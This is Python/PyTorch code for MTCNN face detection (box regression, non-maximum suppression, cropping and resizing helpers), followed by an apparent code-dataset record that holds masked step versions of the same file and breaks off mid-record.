im_data = torch.cat(im_data, dim=0)
im_data = (im_data - 127.5) * 0.0078125
out = []
for batch in im_data.split(2000):
out += [rnet(batch)]
z = list(zip(*out))
out = (torch.cat(z[0]), torch.cat(z[1]))
empty_cache(device)
out0 = out[0].permute(1, 0)
out1 = out[1].permute(1, 0)
score = out1[1, :]
ipass = score > threshold[1]
boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)
image_inds = image_inds[ipass]
mv = out0[:, ipass].permute(1, 0)
# NMS within each image
pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
boxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]
boxes = bbreg(boxes, mv)
boxes = rerec(boxes)
# Third stage
points = torch.zeros(0, 5, 2, device=device)
if len(boxes) > 0:
y, ey, x, ex = pad(boxes, w, h)
im_data = []
for k in range(len(y)):
if ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):
img_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)
im_data.append(imresample(img_k, (48, 48)))
im_data = torch.cat(im_data, dim=0)
im_data = (im_data - 127.5) * 0.0078125
out = []
for batch in im_data.split(500):
out += [onet(batch)]
z = list(zip(*out))
out = (torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2]))
empty_cache(device)
out0 = out[0].permute(1, 0)
out1 = out[1].permute(1, 0)
out2 = out[2].permute(1, 0)
score = out2[1, :]
points = out1
ipass = score > threshold[2]
points = points[:, ipass]
boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)
image_inds = image_inds[ipass]
mv = out0[:, ipass].permute(1, 0)
w_i = boxes[:, 2] - boxes[:, 0] + 1
h_i = boxes[:, 3] - boxes[:, 1] + 1
points_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1) - 1
points_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1) - 1
points = torch.stack((points_x, points_y)).permute(2, 1, 0)
boxes = bbreg(boxes, mv)
# NMS within each image using "Min" strategy
# pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)
pick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7, 'Min')
boxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]
boxes = boxes.cpu().numpy()
points = points.cpu().numpy()
batch_boxes = []
batch_points = []
for b_i in range(batch_size):
b_i_inds = np.where(image_inds == b_i)
batch_boxes.append(boxes[b_i_inds].copy())
batch_points.append(points[b_i_inds].copy())
batch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)
empty_cache(device)
return batch_boxes, batch_points
def bbreg(boundingbox, reg):
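	# apply bounding-box regression offsets, scaled by each box's width and height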
if reg.shape[1] == 1:
reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
b1 = boundingbox[:, 0] + reg[:, 0] * w
b2 = boundingbox[:, 1] + reg[:, 1] * h
b3 = boundingbox[:, 2] + reg[:, 2] * w
b4 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)
return boundingbox
def generateBoundingBox(reg, probs, scale, thresh):
stride = 2
cellsize = 12
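	# map P-Net feature-map positions back to input-image coordinates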
reg = reg.permute(1, 0, 2, 3)
mask = probs >= thresh
mask_inds = mask.nonzero(as_tuple=False)
image_inds = mask_inds[:, 0]
score = probs[mask]
reg = reg[:, mask].permute(1, 0)
bb = mask_inds[:, 1:].type(reg.dtype).flip(1)
q1 = ((stride * bb + 1) / scale).floor()
q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()
boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)
return boundingbox, image_inds
def nms_numpy(boxes, scores, threshold, method):
if boxes.size == 0:
return np.empty((0, 3))
x1 = boxes[:, 0].copy()
y1 = boxes[:, 1].copy()
x2 = boxes[:, 2].copy()
y2 = boxes[:, 3].copy()
s = scores
area = (x2 - x1 + 1) * (y2 - y1 + 1)
I = np.argsort(s)
pick = np.zeros_like(s, dtype=np.int16)
counter = 0
while I.size > 0:
i = I[-1]
pick[counter] = i
counter += 1
idx = I[0:-1]
xx1 = np.maximum(x1[i], x1[idx]).copy()
yy1 = np.maximum(y1[i], y1[idx]).copy()
xx2 = np.minimum(x2[i], x2[idx]).copy()
yy2 = np.minimum(y2[i], y2[idx]).copy()
w = np.maximum(0.0, xx2 - xx1 + 1).copy()
h = np.maximum(0.0, yy2 - yy1 + 1).copy()
inter = w * h
if method == "Min":
o = inter / np.minimum(area[i], area[idx])
else:
o = inter / (area[i] + area[idx] - inter)
I = I[np.where(o <= threshold)]
pick = pick[:counter].copy()
return pick
def batched_nms_numpy(boxes, scores, idxs, threshold, method):
device = boxes.device
if boxes.numel() == 0:
return torch.empty((0,), dtype=torch.int64, device=device)
# strategy: in order to perform NMS independently per class.
# we add an offset to all the boxes. The offset is dependent
# only on the class idx, and is large enough so that boxes
# from different classes do not overlap
max_coordinate = boxes.max()
offsets = idxs.to(boxes) * (max_coordinate + 1)
boxes_for_nms = boxes + offsets[:, None]
boxes_for_nms = boxes_for_nms.cpu().numpy()
scores = scores.cpu().numpy()
keep = nms_numpy(boxes_for_nms, scores, threshold, method)
return torch.as_tensor(keep, dtype=torch.long, device=device)
def pad(boxes, w, h):
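	# clamp boxes to the image bounds; returns 1-based (y, ey, x, ex) crop indices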
boxes = boxes.trunc().int().cpu().numpy()
x = boxes[:, 0]
y = boxes[:, 1]
ex = boxes[:, 2]
ey = boxes[:, 3]
x[x < 1] = 1
y[y < 1] = 1
ex[ex > w] = w
ey[ey > h] = h
return y, ey, x, ex
def rerec(bboxA):
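	# expand each box to a square about its center (the nets expect square crops)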
h = bboxA[:, 3] - bboxA[:, 1]
w = bboxA[:, 2] - bboxA[:, 0]
l = torch.max(w, h)
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5
bboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)
return bboxA
def imresample(img, sz):
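	# resize with 'area' interpolation (equivalent to adaptive average pooling)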
im_data = interpolate(img, size=sz, mode="area")
return im_data
|
normal
|
{
"blob_id": "865121e7eb5f9c70adf44d33d21f30c22f13ec56",
"index": 7012,
"step-1": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\n<mask token>\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, 
ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-2": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\n<mask token>\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, 
ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-3": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\ndef empty_cache(device):\n if 'cuda' in device:\n with torch.cuda.device(device):\n torch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = 
nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), 